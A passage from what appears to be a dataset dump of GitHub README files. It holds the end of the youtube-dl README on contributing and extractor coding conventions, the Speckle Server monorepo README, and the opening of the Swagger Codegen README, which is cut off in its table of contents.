ancient versions hundreds of releases old, because of simple syntactic errors (not in youtube-dl but in general shell usage), because the problem was already reported multiple times before, because people did not actually read an error message, even if it said \"please install ffmpeg\", because people did not mention the URL they were trying to download and many more simple, easy-to-avoid problems, many of whom were totally unrelated to youtube-dl.\n\nyoutube-dl is an open-source project manned by too few volunteers, so we'd rather spend time fixing bugs where we are certain none of those simple problems apply, and where we can be reasonably confident to be able to reproduce the issue without asking the reporter repeatedly. As such, the output of `youtube-dl -v YOUR_URL_HERE` is really all that's required to file an issue. The issue template also guides you through some basic steps you can do, such as checking that your version of youtube-dl is current.\n\n# DEVELOPER INSTRUCTIONS\n\nMost users do not need to build youtube-dl and can [download the builds](https://ytdl-org.github.io/youtube-dl/download.html) or get them from their distribution.\n\nTo run youtube-dl as a developer, you don't need to build anything either. Simply execute\n\n python -m youtube_dl\n\nTo run the test, simply invoke your favorite test runner, or execute a test file directly; any of the following work:\n\n python -m unittest discover\n python test/test_download.py\n nosetests\n\nSee item 6 of [new extractor tutorial](#adding-support-for-a-new-site) for how to run extractor specific test cases.\n\nIf you want to create a build of youtube-dl yourself, you'll need\n\n* python\n* make (only GNU make is supported)\n* pandoc\n* zip\n* nosetests\n\n### Adding support for a new site\n\nIf you want to add support for a new site, first of all **make sure** this site is **not dedicated to [copyright infringement](README.md#can-you-add-support-for-this-anime-video-site-or-site-which-shows-current-movies-for-free)**. youtube-dl does **not support** such sites thus pull requests adding support for them **will be rejected**.\n\nAfter you have ensured this site is distributing its content legally, you can follow this quick list (assuming your service is called `yourextractor`):\n\n1. [Fork this repository](https://github.com/ytdl-org/youtube-dl/fork)\n2. Check out the source code with:\n\n git clone git@github.com:YOUR_GITHUB_USERNAME/youtube-dl.git\n\n3. Start a new git branch with\n\n cd youtube-dl\n git checkout -b yourextractor\n\n4. Start with this simple template and save it to `youtube_dl/extractor/yourextractor.py`:\n\n ```python\n # coding: utf-8\n from __future__ import unicode_literals\n\n from .common import InfoExtractor\n\n\n class YourExtractorIE(InfoExtractor):\n _VALID_URL = r'https?://(?:www\\.)?yourextractor\\.com/watch/(?P<id>[0-9]+)'\n _TEST = {\n 'url': 'https://yourextractor.com/watch/42',\n 'md5': 'TODO: md5 sum of the first 10241 bytes of the video file (use --test)',\n 'info_dict': {\n 'id': '42',\n 'ext': 'mp4',\n 'title': 'Video title goes here',\n 'thumbnail': r're:^https?://.*\\.jpg$',\n # TODO more properties, either as:\n # * A value\n # * MD5 checksum; start the string with md5:\n # * A regular expression; start the string with re:\n # * Any Python type (for example int or float)\n }\n }\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n webpage = self._download_webpage(url, video_id)\n\n # TODO more code goes here, for example ...\n title = self._html_search_regex(r'<h1>(.+?)</h1>', webpage, 'title')\n\n return {\n 'id': video_id,\n 'title': title,\n 'description': self._og_search_description(webpage),\n 'uploader': self._search_regex(r'<div[^>]+id=\"uploader\"[^>]*>([^<]+)<', webpage, 'uploader', fatal=False),\n # TODO more properties (see youtube_dl/extractor/common.py)\n }\n ```\n5. Add an import in [`youtube_dl/extractor/extractors.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/extractor/extractors.py).\n6. Run `python test/test_download.py TestDownload.test_YourExtractor`. This *should fail* at first, but you can continually re-run it until you're done. If you decide to add more than one test, then rename ``_TEST`` to ``_TESTS`` and make it into a list of dictionaries. The tests will then be named `TestDownload.test_YourExtractor`, `TestDownload.test_YourExtractor_1`, `TestDownload.test_YourExtractor_2`, etc. Note that tests with `only_matching` key in test's dict are not counted in.\n7. Have a look at [`youtube_dl/extractor/common.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/extractor/common.py) for possible helper methods and a [detailed description of what your extractor should and may return](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303). Add tests and code for as many as you want.\n8. Make sure your code follows [youtube-dl coding conventions](#youtube-dl-coding-conventions) and check the code with [flake8](https://flake8.pycqa.org/en/latest/index.html#quickstart):\n\n $ flake8 youtube_dl/extractor/yourextractor.py\n\n9. Make sure your code works under all [Python](https://www.python.org/) versions claimed supported by youtube-dl, namely 2.6, 2.7, and 3.2+.\n10. When the tests pass, [add](https://git-scm.com/docs/git-add) the new files and [commit](https://git-scm.com/docs/git-commit) them and [push](https://git-scm.com/docs/git-push) the result, like this:\n\n $ git add youtube_dl/extractor/extractors.py\n $ git add youtube_dl/extractor/yourextractor.py\n $ git commit -m '[yourextractor] Add new extractor'\n $ git push origin yourextractor\n\n11. Finally, [create a pull request](https://help.github.com/articles/creating-a-pull-request). We'll then review and merge it.\n\nIn any case, thank you very much for your contributions!\n\n## youtube-dl coding conventions\n\nThis section introduces a guide lines for writing idiomatic, robust and future-proof extractor code.\n\nExtractors are very fragile by nature since they depend on the layout of the source data provided by 3rd party media hosters out of your control and this layout tends to change. As an extractor implementer your task is not only to write code that will extract media links and metadata correctly but also to minimize dependency on the source's layout and even to make the code foresee potential future changes and be ready for that. This is important because it will allow the extractor not to break on minor layout changes thus keeping old youtube-dl versions working. Even though this breakage issue is easily fixed by emitting a new version of youtube-dl with a fix incorporated, all the previous versions become broken in all repositories and distros' packages that may not be so prompt in fetching the update from us. Needless to say, some non rolling release distros may never receive an update at all.\n\n### Mandatory and optional metafields\n\nFor extraction to work youtube-dl relies on metadata your extractor extracts and provides to youtube-dl expressed by an [information dictionary](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303) or simply *info dict*. Only the following meta fields in the *info dict* are considered mandatory for a successful extraction process by youtube-dl:\n\n - `id` (media identifier)\n - `title` (media title)\n - `url` (media download URL) or `formats`\n\nIn fact only the last option is technically mandatory (i.e. if you can't figure out the download location of the media the extraction does not make any sense). But by convention youtube-dl also treats `id` and `title` as mandatory. Thus the aforementioned metafields are the critical data that the extraction does not make any sense without and if any of them fail to be extracted then the extractor is considered completely broken.\n\n[Any field](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L188-L303) apart from the aforementioned ones are considered **optional**. That means that extraction should be **tolerant** to situations when sources for these fields can potentially be unavailable (even if they are always available at the moment) and **future-proof** in order not to break the extraction of general purpose mandatory fields.\n\n#### Example\n\nSay you have some source dictionary `meta` that you've fetched as JSON with HTTP request and it has a key `summary`:\n\n```python\nmeta = self._download_json(url, video_id)\n```\n \nAssume at this point `meta`'s layout is:\n\n```python\n{\n ...\n \"summary\": \"some fancy summary text\",\n ...\n}\n```\n\nAssume you want to extract `summary` and put it into the resulting info dict as `description`. Since `description` is an optional meta field you should be ready that this key may be missing from the `meta` dict, so that you should extract it like:\n\n```python\ndescription = meta.get('summary') # correct\n```\n\nand not like:\n\n```python\ndescription = meta['summary'] # incorrect\n```\n\nThe latter will break extraction process with `KeyError` if `summary` disappears from `meta` at some later time but with the former approach extraction will just go ahead with `description` set to `None` which is perfectly fine (remember `None` is equivalent to the absence of data).\n\nSimilarly, you should pass `fatal=False` when extracting optional data from a webpage with `_search_regex`, `_html_search_regex` or similar methods, for instance:\n\n```python\ndescription = self._search_regex(\n r'<span[^>]+id=\"title\"[^>]*>([^<]+)<',\n webpage, 'description', fatal=False)\n```\n\nWith `fatal` set to `False` if `_search_regex` fails to extract `description` it will emit a warning and continue extraction.\n\nYou can also pass `default=<some fallback value>`, for example:\n\n```python\ndescription = self._search_regex(\n r'<span[^>]+id=\"title\"[^>]*>([^<]+)<',\n webpage, 'description', default=None)\n```\n\nOn failure this code will silently continue the extraction with `description` set to `None`. That is useful for metafields that may or may not be present.\n \n### Provide fallbacks\n\nWhen extracting metadata try to do so from multiple sources. For example if `title` is present in several places, try extracting from at least some of them. This makes it more future-proof in case some of the sources become unavailable.\n\n#### Example\n\nSay `meta` from the previous example has a `title` and you are about to extract it. Since `title` is a mandatory meta field you should end up with something like:\n\n```python\ntitle = meta['title']\n```\n\nIf `title` disappears from `meta` in future due to some changes on the hoster's side the extraction would fail since `title` is mandatory. That's expected.\n\nAssume that you have some another source you can extract `title` from, for example `og:title` HTML meta of a `webpage`. In this case you can provide a fallback scenario:\n\n```python\ntitle = meta.get('title') or self._og_search_title(webpage)\n```\n\nThis code will try to extract from `meta` first and if it fails it will try extracting `og:title` from a `webpage`.\n\n### Regular expressions\n\n#### Don't capture groups you don't use\n\nCapturing group must be an indication that it's used somewhere in the code. Any group that is not used must be non capturing.\n\n##### Example\n\nDon't capture id attribute name here since you can't use it for anything anyway.\n\nCorrect:\n\n```python\nr'(?:id|ID)=(?P<id>\\d+)'\n```\n\nIncorrect:\n```python\nr'(id|ID)=(?P<id>\\d+)'\n```\n\n\n#### Make regular expressions relaxed and flexible\n\nWhen using regular expressions try to write them fuzzy, relaxed and flexible, skipping insignificant parts that are more likely to change, allowing both single and double quotes for quoted values and so on.\n \n##### Example\n\nSay you need to extract `title` from the following HTML code:\n\n```html\n<span style=\"position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;\" class=\"title\">some fancy title</span>\n```\n\nThe code for that task should look similar to:\n\n```python\ntitle = self._search_regex(\n r'<span[^>]+class=\"title\"[^>]*>([^<]+)', webpage, 'title')\n```\n\nOr even better:\n\n```python\ntitle = self._search_regex(\n r'<span[^>]+class=([\"\\'])title\\1[^>]*>(?P<title>[^<]+)',\n webpage, 'title', group='title')\n```\n\nNote how you tolerate potential changes in the `style` attribute's value or switch from using double quotes to single for `class` attribute: \n\nThe code definitely should not look like:\n\n```python\ntitle = self._search_regex(\n r'<span style=\"position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;\" class=\"title\">(.*?)</span>',\n webpage, 'title', group='title')\n```\n\n### Long lines policy\n\nThere is a soft limit to keep lines of code under 80 characters long. This means it should be respected if possible and if it does not make readability and code maintenance worse.\n\nFor example, you should **never** split long string literals like URLs or some other often copied entities over multiple lines to fit this limit:\n\nCorrect:\n\n```python\n'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4'\n```\n\nIncorrect:\n\n```python\n'https://www.youtube.com/watch?v=FqZTN594JQw&list='\n'PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4'\n```\n\n### Inline values\n\nExtracting variables is acceptable for reducing code duplication and improving readability of complex expressions. However, you should avoid extracting variables used only once and moving them to opposite parts of the extractor file, which makes reading the linear flow difficult.\n\n#### Example\n\nCorrect:\n\n```python\ntitle = self._html_search_regex(r'<title>([^<]+)', webpage, 'title')\n```\n\nIncorrect:\n\n```python\nTITLE_RE = r'([^<]+)'\n# ...some lines of code...\ntitle = self._html_search_regex(TITLE_RE, webpage, 'title')\n```\n\n### Collapse fallbacks\n\nMultiple fallback values can quickly become unwieldy. Collapse multiple fallback values into a single expression via a list of patterns.\n\n#### Example\n\nGood:\n\n```python\ndescription = self._html_search_meta(\n ['og:description', 'description', 'twitter:description'],\n webpage, 'description', default=None)\n```\n\nUnwieldy:\n\n```python\ndescription = (\n self._og_search_description(webpage, default=None)\n or self._html_search_meta('description', webpage, default=None)\n or self._html_search_meta('twitter:description', webpage, default=None))\n```\n\nMethods supporting list of patterns are: `_search_regex`, `_html_search_regex`, `_og_search_property`, `_html_search_meta`.\n\n### Trailing parentheses\n\nAlways move trailing parentheses after the last argument.\n\n#### Example\n\nCorrect:\n\n```python\n lambda x: x['ResultSet']['Result'][0]['VideoUrlSet']['VideoUrl'],\n list)\n```\n\nIncorrect:\n\n```python\n lambda x: x['ResultSet']['Result'][0]['VideoUrlSet']['VideoUrl'],\n list,\n)\n```\n\n### Use convenience conversion and parsing functions\n\nWrap all extracted numeric data into safe functions from [`youtube_dl/utils.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/utils.py): `int_or_none`, `float_or_none`. Use them for string to number conversions as well.\n\nUse `url_or_none` for safe URL processing.\n\nUse `try_get` for safe metadata extraction from parsed JSON.\n\nUse `unified_strdate` for uniform `upload_date` or any `YYYYMMDD` meta field extraction, `unified_timestamp` for uniform `timestamp` extraction, `parse_filesize` for `filesize` extraction, `parse_count` for count meta fields extraction, `parse_resolution`, `parse_duration` for `duration` extraction, `parse_age_limit` for `age_limit` extraction. \n\nExplore [`youtube_dl/utils.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/utils.py) for more useful convenience functions.\n\n#### More examples\n\n##### Safely extract optional description from parsed JSON\n```python\ndescription = try_get(response, lambda x: x['result']['video'][0]['summary'], compat_str)\n```\n\n##### Safely extract more optional metadata\n```python\nvideo = try_get(response, lambda x: x['result']['video'][0], dict) or {}\ndescription = video.get('summary')\nduration = float_or_none(video.get('durationMs'), scale=1000)\nview_count = int_or_none(video.get('views'))\n```\n\n# EMBEDDING YOUTUBE-DL\n\nyoutube-dl makes the best effort to be a good command-line program, and thus should be callable from any programming language. If you encounter any problems parsing its output, feel free to [create a report](https://github.com/ytdl-org/youtube-dl/issues/new).\n\nFrom a Python program, you can embed youtube-dl in a more powerful fashion, like this:\n\n```python\nfrom __future__ import unicode_literals\nimport youtube_dl\n\nydl_opts = {}\nwith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc'])\n```\n\nMost likely, you'll want to use various options. For a list of options available, have a look at [`youtube_dl/YoutubeDL.py`](https://github.com/ytdl-org/youtube-dl/blob/3e4cedf9e8cd3157df2457df7274d0c842421945/youtube_dl/YoutubeDL.py#L137-L312). For a start, if you want to intercept youtube-dl's output, set a `logger` object.\n\nHere's a more complete example of a program that outputs only errors (and a short message after the download is finished), and downloads/converts the video to an mp3 file:\n\n```python\nfrom __future__ import unicode_literals\nimport youtube_dl\n\n\nclass MyLogger(object):\n def debug(self, msg):\n pass\n\n def warning(self, msg):\n pass\n\n def error(self, msg):\n print(msg)\n\n\ndef my_hook(d):\n if d['status'] == 'finished':\n print('Done downloading, now converting ...')\n\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n 'logger': MyLogger(),\n 'progress_hooks': [my_hook],\n}\nwith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc'])\n```\n\n# BUGS\n\nBugs and suggestions should be reported at: . Unless you were prompted to or there is another pertinent reason (e.g. GitHub fails to accept the bug report), please do not send bug reports via personal email. For discussions, join us in the IRC channel [#youtube-dl](irc://chat.freenode.net/#youtube-dl) on freenode ([webchat](https://webchat.freenode.net/?randomnick=1&channels=youtube-dl)).\n\n**Please include the full output of youtube-dl when run with `-v`**, i.e. **add** `-v` flag to **your command line**, copy the **whole** output and post it in the issue body wrapped in \\`\\`\\` for better formatting. It should look similar to this:\n```\n$ youtube-dl -v \n[debug] System config: []\n[debug] User config: []\n[debug] Command-line args: [u'-v', u'https://www.youtube.com/watch?v=BaW_jenozKcj']\n[debug] Encodings: locale cp1251, fs mbcs, out cp866, pref cp1251\n[debug] youtube-dl version 2015.12.06\n[debug] Git HEAD: 135392e\n[debug] Python version 2.6.6 - Windows-2003Server-5.2.3790-SP2\n[debug] exe versions: ffmpeg N-75573-g1d0487f, ffprobe N-75573-g1d0487f, rtmpdump 2.4\n[debug] Proxy map: {}\n...\n```\n**Do not post screenshots of verbose logs; only plain text is acceptable.**\n\nThe output (including the first lines) contains important debugging information. Issues without the full output are often not reproducible and therefore do not get solved in short order, if ever.\n\nPlease re-read your issue once again to avoid a couple of common mistakes (you can and should use this as a checklist):\n\n### Is the description of the issue itself sufficient?\n\nWe often get issue reports that we cannot really decipher. While in most cases we eventually get the required information after asking back multiple times, this poses an unnecessary drain on our resources. Many contributors, including myself, are also not native speakers, so we may misread some parts.\n\nSo please elaborate on what feature you are requesting, or what bug you want to be fixed. Make sure that it's obvious\n\n- What the problem is\n- How it could be fixed\n- How your proposed solution would look like\n\nIf your report is shorter than two lines, it is almost certainly missing some of these, which makes it hard for us to respond to it. We're often too polite to close the issue outright, but the missing info makes misinterpretation likely. As a committer myself, I often get frustrated by these issues, since the only possible way for me to move forward on them is to ask for clarification over and over.\n\nFor bug reports, this means that your report should contain the *complete* output of youtube-dl when called with the `-v` flag. The error message you get for (most) bugs even says so, but you would not believe how many of our bug reports do not contain this information.\n\nIf your server has multiple IPs or you suspect censorship, adding `--call-home` may be a good idea to get more diagnostics. If the error is `ERROR: Unable to extract ...` and you cannot reproduce it from multiple countries, add `--dump-pages` (warning: this will yield a rather large output, redirect it to the file `log.txt` by adding `>log.txt 2>&1` to your command-line) or upload the `.dump` files you get when you add `--write-pages` [somewhere](https://gist.github.com/).\n\n**Site support requests must contain an example URL**. An example URL is a URL you might want to download, like `https://www.youtube.com/watch?v=BaW_jenozKc`. There should be an obvious video present. Except under very special circumstances, the main page of a video service (e.g. `https://www.youtube.com/`) is *not* an example URL.\n\n### Are you using the latest version?\n\nBefore reporting any issue, type `youtube-dl -U`. This should report that you're up-to-date. About 20% of the reports we receive are already fixed, but people are using outdated versions. This goes for feature requests as well.\n\n### Is the issue already documented?\n\nMake sure that someone has not already opened the issue you're trying to open. Search at the top of the window or browse the [GitHub Issues](https://github.com/ytdl-org/youtube-dl/search?type=Issues) of this repository. If there is an issue, feel free to write something along the lines of \"This affects me as well, with version 2015.01.01. Here is some more information on the issue: ...\". While some issues may be old, a new post into them often spurs rapid activity.\n\n### Why are existing options not enough?\n\nBefore requesting a new feature, please have a quick peek at [the list of supported options](https://github.com/ytdl-org/youtube-dl/blob/master/README.md#options). Many feature requests are for features that actually exist already! Please, absolutely do show off your work in the issue report and detail how the existing similar options do *not* solve your problem.\n\n### Is there enough context in your bug report?\n\nPeople want to solve problems, and often think they do us a favor by breaking down their larger problems (e.g. wanting to skip already downloaded files) to a specific request (e.g. requesting us to look whether the file exists before downloading the info page). However, what often happens is that they break down the problem into two steps: One simple, and one impossible (or extremely complicated one).\n\nWe are then presented with a very complicated request when the original problem could be solved far easier, e.g. by recording the downloaded video IDs in a separate file. To avoid this, you must include the greater context where it is non-obvious. In particular, every feature request that does not consist of adding support for a new site should contain a use case scenario that explains in what situation the missing feature would be useful.\n\n### Does the issue involve one problem, and one problem only?\n\nSome of our users seem to think there is a limit of issues they can or should open. There is no limit of issues they can or should open. While it may seem appealing to be able to dump all your issues into one ticket, that means that someone who solves one of your issues cannot mark the issue as closed. Typically, reporting a bunch of issues leads to the ticket lingering since nobody wants to attack that behemoth, until someone mercifully splits the issue into multiple ones.\n\nIn particular, every site support request issue should only pertain to services at one site (generally under a common domain, but always using the same backend technology). Do not request support for vimeo user videos, White house podcasts, and Google Plus pages in the same issue. Also, make sure that you don't post bug reports alongside feature requests. As a rule of thumb, a feature request does not include outputs of youtube-dl that are not immediately related to the feature at hand. Do not post reports of a network error alongside the request for a new video service.\n\n### Is anyone going to need the feature?\n\nOnly post features that you (or an incapacitated friend you can personally talk to) require. Do not post features because they seem like a good idea. If they are really useful, they will be requested by someone who requires them.\n\n### Is your question about youtube-dl?\n\nIt may sound strange, but some bug reports we receive are completely unrelated to youtube-dl and relate to a different, or even the reporter's own, application. Please make sure that you are actually using youtube-dl. If you are using a UI for youtube-dl, report the bug to the maintainer of the actual application providing the UI. On the other hand, if your UI for youtube-dl fails in some way you believe is related to youtube-dl, by all means, go ahead and report the bug.\n\n# COPYRIGHT\n\nyoutube-dl is released into the public domain by the copyright holders.\n\nThis README file was originally written by [Daniel Bolton](https://github.com/dbbolton) and is likewise released into the public domain.\n"}}},{"rowIdx":682,"cells":{"text":{"kind":"string","value":"

\n
\n Speckle | Server\n

\n

\n Server and Web packages\n

\n

Speckle is data infrastructure for the AEC industry.


\n\n

\"Twitter \"Community \"website\" \"docs\"

\n\n

\n\"Speckle-Next\"\n \n\n\"codecov\"\n\n\n\"codecov\"\n\n

\n\n# About Speckle\n\nWhat is Speckle? Check our [![YouTube Video Views](https://img.shields.io/youtube/views/B9humiSpHzM?label=Speckle%20in%201%20minute%20video&style=social)](https://www.youtube.com/watch?v=B9humiSpHzM)\n\n### Features\n\n- **Object-based:** say goodbye to files! Speckle is the first object based platform for the AEC industry\n- **Version control:** Speckle is the Git & Hub for geometry and BIM data\n- **Collaboration:** share your designs collaborate with others\n- **3D Viewer:** see your CAD and BIM models online, share and embed them anywhere\n- **Interoperability:** get your CAD and BIM models into other software without exporting or importing\n- **Real time:** get real time updates and notifications and changes\n- **GraphQL API:** get what you need anywhere you want it\n- **Webhooks:** the base for a automation and next-gen pipelines\n- **Built for developers:** we are building Speckle with developers in mind and got tools for every stack\n- **Built for the AEC industry:** Speckle connectors are plugins for the most common software used in the industry such as Revit, Rhino, Grasshopper, AutoCAD, Civil 3D, Excel, Unreal Engine, Unity, QGIS, Blender, ArchiCAD and more!\n\n### Try Speckle now!\n\nGive Speckle a try in no time by:\n\n- [![speckle XYZ](https://img.shields.io/badge/https://-speckle.xyz-0069ff?style=flat-square&logo=hackthebox&logoColor=white)](https://speckle.xyz) ⇒ creating an account at\n- [![create a droplet](https://img.shields.io/badge/Create%20a%20Droplet-0069ff?style=flat-square&logo=digitalocean&logoColor=white)](https://marketplace.digitalocean.com/apps/speckle-server?refcode=947a2b5d7dc1) ⇒ deploying an instance in 1 click\n\n### Resources\n\n- [![Community forum users](https://img.shields.io/badge/community-forum-green?style=for-the-badge&logo=discourse&logoColor=white)](https://speckle.community) for help, feature requests or just to hang with other speckle enthusiasts, check out our community forum!\n- [![website](https://img.shields.io/badge/tutorials-speckle.systems-royalblue?style=for-the-badge&logo=youtube)](https://speckle.systems) our tutorials portal is full of resources to get you started using Speckle\n- [![docs](https://img.shields.io/badge/docs-speckle.guide-orange?style=for-the-badge&logo=read-the-docs&logoColor=white)](https://speckle.guide/dev/) reference on almost any end-user and developer functionality\n\n# Repo structure\n\nThis monorepo is the home of the Speckle v2 web packages:\n\n- [`packages/server`](https://github.com/specklesystems/speckle-server/blob/main/packages/server): the Server, a nodejs app. Core external dependencies are a Redis and Postgresql db.\n- [`packages/frontend`](https://github.com/specklesystems/speckle-server/blob/main/packages/frontend): the Frontend, a static Vue app.\n- [`packages/viewer`](https://github.com/specklesystems/speckle-server/blob/main/packages/viewer): a threejs extension that allows you to display 3D data [![npm version](https://camo.githubusercontent.com/dc69232cc57b77de6554e752dd6dfc60ca0ecdfbe91bdfcbf7c7531a511ec200/68747470733a2f2f62616467652e667572792e696f2f6a732f253430737065636b6c652532467669657765722e737667)](https://www.npmjs.com/package/@speckle/viewer)\n- [`packages/objectloader`](https://github.com/specklesystems/speckle-server/blob/main/packages/objectloader): a small js utility class that helps you stream an object and all its sub-components from the Speckle Server API. [![npm version](https://camo.githubusercontent.com/4d4f1e38ce50aaf11b4a3ad8e01ce3eaaa561dc5fd08febbae556f52f1d41097/68747470733a2f2f62616467652e667572792e696f2f6a732f253430737065636b6c652532466f626a6563746c6f616465722e737667)](https://www.npmjs.com/package/@speckle/objectloader)\n- [`packages/preview-service`](https://github.com/specklesystems/speckle-server/blob/main/packages/preview-service): generates object previews for Speckle Objects headlessly. This package is meant to be called on by the server.\n- [`packages/webhook-service`](https://github.com/specklesystems/speckle-server/tree/main/packages/webhook-service): making external webhook calls\n- [`packages/fileimport-service`](https://github.com/specklesystems/speckle-server/tree/main/packages/fileimport-service): parsing and importing files\n\n### Other repos\n\nMake sure to also check and ⭐️ these other Speckle repositories:\n\n- [`speckle-sharp`](https://github.com/specklesystems/speckle-sharp): .NET tooling, connectors and interoperability\n- [`specklepy`](https://github.com/specklesystems/specklepy): Python SDK 🐍\n- [`speckle-excel`](https://github.com/specklesystems/speckle-excel): Excel connector\n- [`speckle-unity`](https://github.com/specklesystems/speckle-unity): Unity 3D connector\n- [`speckle-blender`](https://github.com/specklesystems/speckle-blender): Blender connector\n- [`speckle-unreal`](https://github.com/specklesystems/speckle-unreal): Unreal Engine Connector\n- [`speckle-qgis`](https://github.com/specklesystems/speckle-qgis): QGIS connectod\n- [`speckle-powerbi`](https://github.com/specklesystems/speckle-powerbi): PowerBi connector\n- and more [connectors & tooling](https://github.com/specklesystems/)!\n\n## Developing and Debugging\n\nHave you checked our [dev docs](https://speckle.guide/dev/)?\n\nWe have a detailed section on [deploying a Speckle server](https://speckle.guide/dev/server-setup.html). To get started developing locally, you can see the [Local development environment](https://speckle.guide/dev/server-local-dev.html) page.\n\n### TL;DR;\n\nWe're using yarn and its workspaces functionalities to manage the monorepo.\nMake sure you are using nodejs 16+.\nTo get started, run:\n\n`$ corepack enable`\n`$ yarn`\n`$ yarn build`\n\nAfter this, you can use the scripts in the individual packages or run all in dev mode:\n`$ yarn dev`\n\n### IDE\n\nThe suggested IDE for working in this repo is VSCode, because the repo has special configs to improve the DX there (auto-format & auto-lint, recommended extensions etc.).\n\nThis repository relies on [VSCode multi-root workspaces](https://code.visualstudio.com/docs/editor/multi-root-workspaces), so for the best DX and proper formatting/linting make sure you open the project using the `workspace.code-workspace` file instead of just opening the folder in VSCode.\n\n### Contributing\n\nPlease make sure you read the [contribution guidelines](https://github.com/specklesystems/speckle-server/blob/main/CONTRIBUTING.md) for an overview of the best practices we try to follow.\n\nWhen pushing commits to this repo, please follow the following guidelines:\n\n- Before commiting, make sure `$ yarn lint` and `$ yarn prettier:check` checks pass, othewise the pre-commit hook fails.\n- When ready to commit, `$ yarn cz` & follow the prompts.\n- Please use the name of the package as the scope of your commit.\n\n### Security\n\nFor any security vulnerabilities or concerns, please contact us directly at security[at]speckle.systems.\n\n### License\n\nUnless otherwise described, the code in this repository is licensed under the Apache-2.0 License. Please note that some modules, extensions or code herein might be otherwise licensed. This is indicated either in the root of the containing folder under a different license file, or in the respective file's header. If you have any questions, don't hesitate to get in touch with us via [email](mailto:hello@speckle.systems).\n"}}},{"rowIdx":683,"cells":{"text":{"kind":"string","value":"# Swagger Code Generator\n\n[![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)\n[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)\n[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project)\n[![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen)\n\n:star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star:\n\n:notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover:\n\n:warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning:\n\n:rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket:\n\n## Overview\nThis is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported:\n\n- **API clients**: **ActionScript**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, jQuery, Node)\n- **Server stubs**: **C#** (ASP.NET Core, NancyFx), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra)\n- **API documentation generators**: **HTML**, **Confluence Wiki** \n- **Others**: **JMeter**\n\nCheck out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project.\n\n# Table of contents\n\n - [Swagger Code Generator](#swagger-code-generator)\n - [Overview](#overview)\n - [Table of Contents](#table-of-contents)\n - Installation\n - [Compatibility](#compatibility)\n - [Prerequisites](#prerequisites)\n - [OS X Users](#os-x-users)\n - [Building](#building)\n - [Docker](#docker)\n - [Build and run](#build-and-run-using-docker)\n - [Run docker in Vagrant](#run-docker-in-vagrant)\n - [Public Docker image](#public-docker-image)\n - [Homebrew](#homebrew)\n - [Getting Started](#getting-started)\n - Generators\n - [To generate a sample client library](#to-generate-a-sample-client-library)\n - [Generating libraries from your 